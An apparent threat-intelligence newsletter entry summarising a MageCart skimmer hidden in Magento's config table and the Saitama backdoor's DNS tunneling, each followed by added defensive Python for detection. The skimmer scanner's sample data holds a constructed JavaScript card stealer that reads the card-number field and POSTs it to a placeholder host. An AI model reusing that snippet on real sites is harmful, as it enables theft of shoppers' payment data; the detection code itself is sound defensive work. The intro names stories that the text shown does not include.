Source: Anomali
Identifier: 4921519
Publication date: 2022-06-01 17:47:00 (viewed: 2022-06-01 18:07:16)
Title: Anomali Cyber Watch: TURLA's New Phishing-Based Reconnaissance Campaign in Eastern Europe, Unknown APT Group Has Targeted Russia Repeatedly Since Ukraine Invasion and More
Text:
The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Chromeloader, Goodwill, MageCart, Saitama, Turla and Yashma. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Credit Card Stealer Targets PsiGate Payment Gateway Software
(published: May 25, 2022)
Sucuri researchers have detailed their findings on a MageCart skimmer discovered within the Magento payment portal. Embedded in the core_config_data table of Magento's database, the skimmer was obfuscated and encoded with CharCode. Once deobfuscated, a JavaScript credit card stealer was revealed. The stealer acquires text and fields submitted to the payment page, including credit card numbers and expiry dates. Once stolen, the data is exfiltrated via a synchronous AJAX request.
Analyst Comment: Harden endpoint security and utilize firewalls to block suspicious activity to help mitigate against skimmer injection. Monitor network traffic to identify anomalous behavior that may indicate C2 activity.
MITRE ATT&CK: [MITRE ATT&CK] Exfiltration Over C2 Channel - T1041 | [MITRE ATT&CK] Data Encoding - T1132 | [MITRE ATT&CK] Input Capture - T1056
Tags: MageCart, skimmer, JavaScript, Magento, PsiGate, AJAX
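The story above describes a skimmer hidden as CharCode-encoded JavaScript inside Magento's core_config_data table. The following is an added example (not Sucuri's or Anomali's code) showing how a defender can scan exported config rows for String.fromCharCode(...) blobs, decode them, and flag the ones whose decoded content references payment fields or request objects. The rows, the indicator list and the domain name in the sample are constructed for the example; the row layout only mirrors the column names of core_config_data.

```python
import re

def _charcode_blob(js):
    # Helper used only to build the constructed sample row: wraps JS in a
    # String.fromCharCode(...) call, the obfuscation style the story describes.
    return "String.fromCharCode(" + ",".join(str(ord(c)) for c in js) + ")"

# Constructed rows shaped like core_config_data: (config_id, scope, scope_id, path, value).
# Row 2 is the skimmer-like value; row 3 uses fromCharCode legitimately (a copyright sign).
SAMPLE_ROWS = [
    (1, "default", 0, "design/head/includes",
     '<link rel="stylesheet" href="/static/custom.css">'),
    (2, "default", 0, "design/footer/absolute_footer",
     "<script>eval(" + _charcode_blob(
         "var cc=document.querySelector('#cc_number').value;"
         "var xhr=new XMLHttpRequest();xhr.open('POST','//exfil-placeholder.test',false);xhr.send(cc);"
     ) + ")</script>"),
    (3, "default", 0, "design/footer/copyright",
     "<script>document.write(String.fromCharCode(169)+' 2022 Example Shop')</script>"),
]

FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([0-9\s,]+)\)")

# Strings a payment-page skimmer typically has to reference. Their presence in
# decoded config content is a triage signal, not proof on its own (assumed list).
SKIMMER_INDICATORS = ("cc_number", "card", "cvv", "expir", "XMLHttpRequest", "querySelector")

def decode_charcode(blob):
    """Return every String.fromCharCode(...) argument list found in blob, decoded to text."""
    decoded = []
    for match in FROMCHARCODE.finditer(blob):
        codes = [int(x) for x in match.group(1).replace(" ", "").split(",") if x]
        decoded.append("".join(chr(c) for c in codes))
    return decoded

def scan_rows(rows):
    """Flag config rows whose decoded CharCode content contains skimmer indicators."""
    findings = []
    for config_id, scope, scope_id, path, value in rows:
        for text in decode_charcode(value):
            hits = [ind for ind in SKIMMER_INDICATORS if ind.lower() in text.lower()]
            if hits:
                findings.append({"config_id": config_id, "path": path,
                                 "decoded": text[:80], "indicators": hits})
    return findings

if __name__ == "__main__":
    for f in scan_rows(SAMPLE_ROWS):
        print(f"config_id={f['config_id']} path={f['path']} indicators={f['indicators']}")
```

Row 3 decodes to a single copyright character and is not flagged, which is why the scanner keys on the decoded content rather than on the mere presence of fromCharCode. On a real store the rows would come from a database export of core_config_data, and any flagged value should be compared against the known-good theme configuration before it is removed.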
How the Saitama Backdoor uses DNS Tunneling
(published: May 25, 2022)
Malwarebytes researchers have released a report detailing how the Saitama backdoor uses DNS tunneling to communicate stealthily with its command and control (C2) infrastructure. DNS tunneling is an effective way to hide C2 communication: DNS traffic serves a vital function in modern-day internet communications, so blocking it outright is almost never done. Saitama formats its DNS lookups as a domain name with the structure message.counter.root-domain. Data is encoded using a hardcoded base36 alphabet. There are four types of messages that Saitama can send using this method: Make Contact, to establish communication with a C2 domain; Ask For Command, to get the expected size of the payload to be delivered; Get A Command, in which Saitama makes Receive requests to retrieve payloads and instructions; and finally Run The Command, in which Saitama runs the instructions or executes the payload and sends the results to the established C2.
Analyst Comment: Implement an effective DNS filtering system to block malicious queries. Furthermore, maintaining a whitelist of applications allowed for installation will assist in preventing malware like Saitama from being installed.
MITRE ATT&CK: [MITRE ATT&CK] Data Encoding - T1132 | [MITRE ATT&CK] Exfiltration Over C2 Channel - T1041
Tags: C2, DNS, Saitama, backdoor, base36, DNS tunneling
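The story above gives the shape of Saitama's queries: a base36-encoded message label, a counter label, then the root domain. The following is an added example (not Malwarebytes' or Anomali's code) of the detection logic a defender can run over DNS query logs to surface that pattern: per root domain it measures how many queries are unique, the entropy of the leading label when it is base36-only, and whether the second label behaves like an increasing counter. The log format, the thresholds and the C2 domain name are constructed for the example, and the root domain is assumed to be the last two labels (no public-suffix handling).

```python
import math
import re
from collections import defaultdict

# Constructed DNS query log in a simple "<epoch> <client> <qname> <qtype>" layout.
# Lines are made up for this example; the C2 root domain is a placeholder.
SAMPLE_LOG = """\
1654100000 10.0.0.5 www.example.com A
1654100001 10.0.0.5 mail.example.com A
1654100002 10.0.0.5 www.example.com A
1654100003 10.0.0.7 h4k9z2q1wm.1.c2-placeholder.test A
1654100004 10.0.0.7 t8b3n6y0xp.2.c2-placeholder.test A
1654100005 10.0.0.7 q2v7c5r9jd.3.c2-placeholder.test A
1654100006 10.0.0.7 m1x8f4k6ls.4.c2-placeholder.test A
1654100007 10.0.0.7 w6p0d3g7ez.5.c2-placeholder.test A
1654100008 10.0.0.7 a9j5u2b8nt.6.c2-placeholder.test A
1654100009 10.0.0.9 cdn.example.com AAAA
"""

BASE36_LABEL = re.compile(r"^[a-z0-9]+$")  # lowercase base36 alphabet, as the story describes

def parse_log(text):
    """Parse the constructed log layout into (epoch, client, qname, qtype) tuples."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        epoch, client, qname, qtype = parts
        records.append((int(epoch), client, qname.lower().rstrip("."), qtype))
    return records

def shannon_entropy(s):
    """Bits of entropy per character; encoded data scores higher than hostnames."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def root_domain(qname):
    # Assumption: the registrable domain is the last two labels.
    return ".".join(qname.split(".")[-2:])

def profile_domains(records):
    """Aggregate per root domain the features the tunneling heuristic needs."""
    profiles = defaultdict(lambda: {"queries": 0, "qnames": set(), "entropies": [], "counters": []})
    for _, _, qname, _ in records:
        labels = qname.split(".")
        p = profiles[root_domain(qname)]
        p["queries"] += 1
        p["qnames"].add(qname)
        if len(labels) >= 4:  # message.counter.root.tld
            msg, counter = labels[0], labels[1]
            if BASE36_LABEL.match(msg):
                p["entropies"].append(shannon_entropy(msg))
            if counter.isdigit():
                p["counters"].append(int(counter))
    return profiles

def is_counter_like(counters):
    """True when the counter position holds a strictly increasing integer sequence."""
    return len(counters) >= 3 and all(b > a for a, b in zip(counters, counters[1:]))

def flag_tunneling(profiles, min_queries=5, min_entropy=2.5, min_unique_ratio=0.8):
    """Return root domains whose query pattern matches message.counter.root tunneling."""
    flagged = []
    for domain, p in profiles.items():
        if p["queries"] < min_queries:
            continue
        unique_ratio = len(p["qnames"]) / p["queries"]
        mean_entropy = sum(p["entropies"]) / len(p["entropies"]) if p["entropies"] else 0.0
        if unique_ratio >= min_unique_ratio and mean_entropy >= min_entropy \
                and is_counter_like(p["counters"]):
            flagged.append(domain)
    return flagged

if __name__ == "__main__":
    print(flag_tunneling(profile_domains(parse_log(SAMPLE_LOG))))
```

The combination matters: ordinary domains repeat the same few hostnames (low unique ratio), CDN hashes can be high-entropy but do not carry an increasing counter label, and a counter alone is common in legitimate chunked names. Tuning min_queries and the thresholds against a baseline of the environment's own resolver logs is what keeps the heuristic useful.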
Notes:
Sent: Yes
Tags: Ransomware, Malware, Tool, Threat
Stories: APT 19